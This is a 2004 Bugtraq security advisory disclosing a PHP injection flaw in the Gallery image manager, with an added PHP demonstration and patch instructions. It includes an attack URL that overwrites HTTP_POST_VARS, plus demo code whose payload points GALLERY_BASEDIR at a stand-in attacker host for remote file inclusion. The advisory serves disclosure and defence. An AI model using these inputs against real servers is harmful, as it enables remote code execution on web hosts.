Message-ID: <0c0a01c3e525$1c0ed2b0$c90c030a@bmedirattatg>
Date: Tue, 27 Jan 2004 14:29:52 -0800
From: "Bharat Mediratta" <bharat@...alto.com>
To: <bugtraq@...urityfocus.com>
Subject: Remote exploit in Gallery 1.3.1, 1.3.2, 1.3.3, 1.4 and 1.4.1


(Big thanks to Fred [vrotogel] for discovering this vulnerability
 and alerting us before posting.)

___________________
PROBLEM DESCRIPTION

Gallery is an open source image management system written in PHP.
Learn more about it at http://gallery.sourceforge.net

Starting in release 1.3.1, Gallery includes code to simulate the
behaviour of register_globals in environments where that setting
is disabled.  We do this by extracting the values of the various
$HTTP_ global variables into the global namespace.  We check
for the presence of certain types of malicious data before doing
this, but our checks are inadequate.

An attacker can circumvent our checks by crafting a URL like this:

    http://example.com/gallery/init.php?HTTP_POST_VARS=xxx

This causes our register_globals simulation code to overwrite
$HTTP_POST_VARS with attacker-supplied data; when that array is
extracted in turn, it delivers the payload.  If the payload
compromises $GALLERY_BASEDIR, the attacker can perform a PHP
injection exploit and gain remote access to your box as the
webserver/PHP user id.
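The extraction order described above, shown as an added example that is not Gallery's own code. The request arrays are constructed inline rather than taken from a real HTTP request, and the nested GALLERY_BASEDIR key inside HTTP_POST_VARS is an assumed shape for the "xxx" placeholder in the URL above (PHP parses `HTTP_POST_VARS[GALLERY_BASEDIR]=...` in a query string into exactly such a nested array). The vulnerable function checks only top-level key names and then extracts each array into scope one after another, so a GET parameter named HTTP_POST_VARS replaces the real POST array before that array is extracted. The hardened function copies the arrays first, refuses keys that name a request array or a configuration variable, and extracts with EXTR_SKIP so a variable that already exists is never overwritten.

```php
<?php
// Added example, not Gallery's code: simulates the register_globals
// emulation pattern described in the advisory. The deprecated
// $HTTP_*_VARS globals (removed in PHP 5.4) are stood in for by ordinary
// arrays of the same names, so this runs on any PHP CLI.

// Constructed request. PHP parses the query string
//   init.php?HTTP_POST_VARS[GALLERY_BASEDIR]=http://attacker.example/
// into a nested array under the GET key "HTTP_POST_VARS". The payload
// shape is assumed; the advisory shows only "HTTP_POST_VARS=xxx".
$request = array(
    'HTTP_GET_VARS'    => array(
        'HTTP_POST_VARS' => array('GALLERY_BASEDIR' => 'http://attacker.example/'),
    ),
    'HTTP_POST_VARS'   => array(),
    'HTTP_COOKIE_VARS' => array(),
);

// Vulnerable pattern: scan the top-level keys of each request array for a
// dangerous name, then extract() the arrays into scope one after another.
function vulnerable_emulation(array $req)
{
    $forbidden = array('GALLERY_BASEDIR');
    foreach ($req as $vars) {
        foreach (array_keys($vars) as $k) {
            if (in_array($k, $forbidden, true)) {
                return 'blocked';
            }
        }
    }
    // The check passed: "HTTP_POST_VARS" is not on the list, and the
    // nested GALLERY_BASEDIR key was never looked at.

    $HTTP_GET_VARS    = $req['HTTP_GET_VARS'];
    $HTTP_POST_VARS   = $req['HTTP_POST_VARS'];
    $HTTP_COOKIE_VARS = $req['HTTP_COOKIE_VARS'];
    $GALLERY_BASEDIR  = './';   // trusted default set by the application

    extract($HTTP_GET_VARS);    // replaces $HTTP_POST_VARS with the attacker's array
    extract($HTTP_POST_VARS);   // now sets $GALLERY_BASEDIR from that array
    extract($HTTP_COOKIE_VARS);

    return $GALLERY_BASEDIR;    // attacker-controlled
}

// Hardened pattern: copy every request array before touching the symbol
// table, refuse keys that name a request array or a configuration
// variable, and never overwrite a variable that already exists.
function hardened_emulation(array $req)
{
    $sources  = array($req['HTTP_GET_VARS'], $req['HTTP_POST_VARS'], $req['HTTP_COOKIE_VARS']);
    $reserved = array(
        'HTTP_GET_VARS', 'HTTP_POST_VARS', 'HTTP_COOKIE_VARS', 'HTTP_SERVER_VARS',
        'HTTP_ENV_VARS', 'HTTP_POST_FILES', 'GLOBALS', 'GALLERY_BASEDIR',
    );
    $GALLERY_BASEDIR = './';

    foreach ($sources as $vars) {
        foreach (array_keys($vars) as $k) {
            if (in_array($k, $reserved, true)) {
                return 'blocked';
            }
        }
        // EXTR_SKIP: existing variables, $GALLERY_BASEDIR included, are left alone.
        extract($vars, EXTR_SKIP);
    }
    return $GALLERY_BASEDIR;
}

echo 'vulnerable: ', vulnerable_emulation($request), "\n";
echo 'hardened:   ', hardened_emulation($request), "\n";
```

Run with the PHP CLI: the vulnerable function returns the attacker's URL as $GALLERY_BASEDIR, the hardened one returns "blocked" on the first reserved key it meets. The advisory's consequence follows from the first result: any include or require that the application later builds from $GALLERY_BASEDIR is resolved against attacker-controlled input, which is the PHP injection the text describes. Of the two defences, copying the arrays before the first extract() is the one that matters most, since it removes the ordering dependency entirely; the reserved-key list and EXTR_SKIP are defence in depth.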

_________________
VERSIONS AFFECTED

This vulnerability affects Gallery releases 1.3.1, 1.3.2, 1.3.3,
1.4 and 1.4.1.  It has been fixed in Gallery v1.4.1-pl1, v1.4.2
(not yet released) and in the CVS HEAD.  We strongly recommend
that all users upgrade to Gallery v1.4.1-pl1 ASAP.

__________________
FIXING THE PROBLEM

There are three different ways you can resolve this problem.

1.  Replace init.php and setup/init.php with the files from this zip:

http://prdownloads.sourceforge.net/gallery/patch_1.4.1-to-1.4.1-pl1.zip?download

     -or-

2.  Upgrade to Gallery 1.4.1-pl1:

http://sourceforge.net/project/showfiles.php?group_id=7130&package_id=7239&release_id=212324

     -or-

3.  Follow the instructions in this news article:
      http://gallery.sourceforge.net/article.php?sid=107
    to manually patch the two affected files.  (won't take more
    than a couple of minutes).


regards,
Bharat Mediratta
Gallery developer
